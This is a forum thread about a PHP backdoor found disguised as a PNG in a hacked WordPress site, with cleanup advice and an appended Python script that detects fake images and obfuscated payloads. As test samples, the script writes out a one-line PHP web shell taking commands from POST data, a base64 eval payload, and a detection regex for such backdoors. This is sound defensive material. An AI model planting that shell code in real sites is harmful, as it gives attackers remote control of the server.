
PHP/Backdoor shell

Discussion in 'Security' started by KangBroke, Sep 12, 2015.

  1. KangBroke
    #1
    I was backing up my files via FTP from GoDaddy, where I have several websites hosted. When I got to one of my websites, honda repair videos, I downloaded a file at \wp-content\uploads\favicon\bacground.png

    AVG says the process name is C:\Windows\System32\SearchProtocolHost.exe

    AVG gives me this: http://www.avgthreatlabs.com/ww-en/virus-and-malware-information/info/php-backdoor-shell/?name=PHP/BackDoor.Shell&utm_source=TDPU&utm_medium=RS&PRTYPE=AVF&utm_expid=34410884-35.jDed7UusRQ2w2Dh2BoWHZA.0


    My questions are the obvious.

    1. How did this file get here? Was it uploaded by me? (Meaning it's a virus on my computer.)
    2. What would this file do on a hosting account? What AVG is telling me sounds pretty bad. That being said, why did GoDaddy not notice this?
     
    KangBroke, Sep 12, 2015 IP
  2. billzo
    #2
    Keep in mind that it could be a false positive, too. That does happen. I don't know why AVG is reporting a process name that is not the file you suspect may be malware.

    Hosting accounts can get hacked in all sorts of ways. One of the biggest is using an outdated CMS or plugin. Odds are it was not uploaded by you and that your system is not compromised. If there is a compromise, it is likely on your hosting account.

    The problem is that hackers like to stick hidden back doors in when they infect a hosting account, so if the original back door is found, they have another way in. If you think you have been hacked, you can do a fresh install of WordPress, reimport your database (check your database posts for malicious JavaScript or iframes), and when putting your uploads back, eyeball them to make sure they are all png, jpg, gif, etc. Basically, delete any exploitable file in your hosting account and start with fresh files. Then there cannot be a back door. You may have been hacked through other add-on websites you are hosting as well. If you have been hacked.
     
    billzo, Sep 12, 2015 IP
  3. KangBroke
    #3
    So how can I tell if it is a false positive? I was hacked about a year ago. I even made a post here on DP roughly a year ago. I still have the files on GoDaddy's server. So I can find out if there is some alternative way to see if it's infected.

    And whoever hacked me a year ago managed to put base64 code in every index.php and index.html file on my server.
     
    KangBroke, Sep 12, 2015 IP
  4. billzo
    #4
    Given that you were hacked, I would treat it as a real positive and not a false positive.

    You can install fresh WordPress files and that will get rid of any exploits, provided you check your custom theme files for any malicious code and also check your uploads folder for anything suspicious. Then you can search through your database for JavaScript or iframes that do not belong there (you can search the internet and find queries to do this). It should not take too long to get this fixed up. You would be best to move your existing and possibly infected files to another folder for a backup and block access using a "deny from all" in .htaccess. Just replace anything that may be infected with files you know are not infected.
     
    billzo, Sep 12, 2015 IP
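The triage billzo describes in #2 and #4 (check that everything under uploads really is an image, and hunt for the base64 payloads KangBroke mentions in #3) can be scripted rather than eyeballed. The following is an added example written for this page, not code from either poster or from WordPress: it builds a constructed WordPress-like tree in a temp directory (one genuine PNG, one "PNG" that is actually a PHP web shell, one clean index.php and one carrying eval(base64_decode(...))), then flags files whose magic bytes disagree with their extension and PHP/HTML files containing an eval-over-decoder pattern. The file contents, the `wp_` table prefix in the SQL string and the regex are assumptions for illustration; a real site's prefix and payload shapes may differ.

```python
"""Constructed example: triage a WordPress tree for (1) files under
wp-content/uploads whose extension says "image" but whose bytes say PHP, and
(2) PHP/HTML files carrying an eval(base64_decode(...))-style payload.
All sample paths and contents below are made up; nothing is from a real site."""
import os
import re
import tempfile

# Magic bytes for the image types WordPress allows in uploads by default.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Common obfuscated-backdoor shape (assumed pattern): an evaluator wrapped
# around a decoder, e.g. eval(base64_decode(...)) or assert(gzinflate(...)).
BACKDOOR_RE = re.compile(
    rb"(eval|assert|create_function|preg_replace)\s*\(\s*@?"
    rb"(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE,
)
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# The database check billzo alludes to: posts carrying injected tags.
# wp_ is WordPress's default table prefix; change it to the site's own.
INJECTED_POSTS_SQL = (
    "SELECT ID, post_title FROM wp_posts "
    "WHERE post_content LIKE '%<script%' OR post_content LIKE '%<iframe%';"
)


def sniff_type(head: bytes) -> str:
    """Classify a file from its first bytes: an image type by magic number,
    'php' if a PHP open tag appears in the sampled head, else 'unknown'."""
    for magic, kind in IMAGE_MAGIC.items():
        if head.startswith(magic):
            return kind
    if PHP_TAG_RE.search(head):
        return "php"
    return "unknown"


def scan_uploads(uploads_dir: str) -> list[str]:
    """Return upload paths whose content does not match an image extension,
    plus anything that looks like PHP regardless of name."""
    suspicious = []
    for dirpath, _dirs, files in os.walk(uploads_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                kind = sniff_type(fh.read(4096))
            expected = ext.lstrip(".").replace("jpeg", "jpg")
            if (ext in IMAGE_EXTENSIONS and kind != expected) or kind == "php":
                suspicious.append(path)
    return sorted(suspicious)


def scan_php_payloads(root: str) -> list[str]:
    """Return .php/.html files anywhere under root matching BACKDOOR_RE."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".html", ".htm")):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    if BACKDOOR_RE.search(fh.read()):
                        hits.append(path)
    return sorted(hits)


def triage(root: str) -> dict:
    """Run both scans against a WordPress root and return relative paths."""
    uploads = os.path.join(root, "wp-content", "uploads")
    return {
        "fake_images": [os.path.relpath(p, root) for p in scan_uploads(uploads)],
        "backdoored_php": [os.path.relpath(p, root) for p in scan_php_payloads(root)],
    }


def build_sample_site() -> str:
    """Create the constructed sample tree and return its root path."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    favicon = os.path.join(root, "wp-content", "uploads", "favicon")
    os.makedirs(favicon)
    samples = {
        os.path.join(favicon, "favicon.png"): b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        # A web shell hiding behind an image name (constructed sample).
        os.path.join(favicon, "bacground.png"): b"<?php @eval(base64_decode($_POST['c'])); ?>",
        os.path.join(root, "index.php"): b"<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';",
        # An index.php prepended with an obfuscated payload (constructed sample).
        os.path.join(root, "wp-content", "index.php"): b"<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>\n<?php // Silence is golden.",
    }
    for path, content in samples.items():
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    results = triage(build_sample_site())
    for label, paths in results.items():
        print(f"{label}: {paths}")
    print(f"then run against the DB: {INJECTED_POSTS_SQL}")
```

Anything the script flags goes into the quarantine folder billzo suggests rather than being deleted outright, so it can be compared against clean files later. One caveat on the ".htaccess" step: `Deny from all` is Apache 2.2 syntax and only works on Apache 2.4 if mod_access_compat is loaded; the 2.4 equivalent is `Require all denied`. A magic-byte check like the one above catches PHP disguised as an image, but a PHP file whose payload is built from string concatenation rather than a literal `eval(base64_decode(` will slip past BACKDOOR_RE, which is why the fresh-install-and-replace approach in the thread is the reliable end state.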